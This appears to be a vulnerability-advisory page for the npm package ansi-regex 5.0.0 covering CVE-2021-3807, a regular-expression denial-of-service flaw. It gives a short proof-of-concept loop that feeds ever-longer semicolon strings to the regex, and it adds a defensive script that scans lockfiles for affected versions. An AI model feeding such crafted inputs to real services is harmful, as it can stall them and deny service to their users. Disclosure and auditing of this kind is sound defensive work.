NodeJS/ansi-regex/5.0.0


Regular expression for matching ANSI escape codes

https://www.npmjs.com/package/ansi-regex
MIT

1 Security Vulnerabilities

Inefficient Regular Expression Complexity in chalk/ansi-regex

Published date: 2021-09-20T20:20:09Z
CVE: CVE-2021-3807

ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.

Proof of Concept

```js
import ansiRegex from 'ansi-regex';

for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // The input grows by 10,000 ';' characters per iteration after the "ESC[" prefix
    var attack_str = "\u001B[" + ";".repeat(i * 10000);
    ansiRegex().test(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
```

The ReDoS is mainly due to the sub-patterns `[[\\]()#;?]*` and `(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*`.

Affected versions: 3.0.0, 4.0.0, 4.1.0, 5.0.0, 6.0.0
Secure versions: 0.1.0, 0.2.0, 0.2.1, 1.0.0, 1.1.0, 1.1.1, 2.0.0, 2.1.1, 6.0.1, 5.0.1, 4.1.1, 3.0.1
Recommendation: Update to version 6.0.1.
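
To find where an affected release is still installed, including copies nested under other packages, the lockfile can be checked against the affected-version list above. The following is an added example, not code from this page or from the ansi-regex project; the function names and the sample lockfile are constructed for illustration, and it assumes the standard npm `package-lock.json` layouts (a flat `packages` map in lockfileVersion 2/3, a nested `dependencies` tree in lockfileVersion 1).

```javascript
// Added example: audit a parsed package-lock.json for ansi-regex releases
// that the advisory above lists as affected by CVE-2021-3807.
const AFFECTED = new Set(['3.0.0', '4.0.0', '4.1.0', '5.0.0', '6.0.0']);
const NAME = 'ansi-regex';

// lockfileVersion 2/3: flat "packages" map keyed by install path.
function scanPackages(packages, hits) {
  for (const [path, meta] of Object.entries(packages || {})) {
    // The package name is whatever follows the last "node_modules/" segment.
    const leaf = path.split('node_modules/').pop();
    if (leaf === NAME && AFFECTED.has(meta.version)) {
      hits.push({ path, version: meta.version });
    }
  }
}

// lockfileVersion 1: nested "dependencies" tree, walked recursively.
function scanDependencies(deps, trail, hits) {
  for (const [name, meta] of Object.entries(deps || {})) {
    if (name === NAME && AFFECTED.has(meta.version)) {
      hits.push({ path: [...trail, name].join(' > '), version: meta.version });
    }
    scanDependencies(meta.dependencies, [...trail, name], hits);
  }
}

// Returns every affected ansi-regex install recorded in the lockfile object.
function findAffected(lock) {
  const hits = [];
  if (lock.packages) scanPackages(lock.packages, hits);
  else scanDependencies(lock.dependencies, [], hits);
  return hits;
}

// Constructed sample lockfile (v2 layout), not taken from a real project.
const sampleLock = {
  lockfileVersion: 2,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/ansi-regex': { version: '5.0.1' },
    'node_modules/strip-ansi/node_modules/ansi-regex': { version: '5.0.0' },
    'node_modules/wrap-ansi/node_modules/ansi-regex': { version: '3.0.0' },
    'node_modules/ansi-regex-extra': { version: '5.0.0' },
  },
};

for (const hit of findAffected(sampleLock)) {
  console.log(`${hit.path}: ${NAME}@${hit.version} is affected`);
}
```

For a real project, pass `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` to `findAffected`.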

17 Other Versions

Version  License  Security  Released
6.0.1    MIT                2021-09-10 - 20:25  over 2 years
6.0.0    MIT      1         2021-04-16 - 06:02  almost 3 years
5.0.1    MIT                2021-09-14 - 15:55  over 2 years
5.0.0    MIT      1         2019-10-04 - 11:29  over 4 years
4.1.1    MIT                2022-03-12 - 03:08  about 2 years
4.1.0    MIT      1         2019-03-08 - 06:14  about 5 years
4.0.0    MIT      1         2018-09-18 - 08:18  over 5 years
3.0.1    MIT                2022-03-27 - 13:29  about 2 years
3.0.0    MIT      1         2017-06-20 - 19:03  almost 7 years
2.1.1    MIT                2017-01-14 - 03:09  about 7 years
2.0.0    MIT                2015-06-30 - 16:07  over 8 years
1.1.1    MIT                2015-02-22 - 09:24  about 9 years
1.1.0    MIT                2014-08-30 - 12:38  over 9 years
1.0.0    MIT                2014-08-13 - 13:29  over 9 years
0.2.1    MIT                2014-06-20 - 16:44  almost 10 years
0.2.0    MIT                2014-06-14 - 01:12  almost 10 years
0.1.0    MIT                2014-06-03 - 16:59  almost 10 years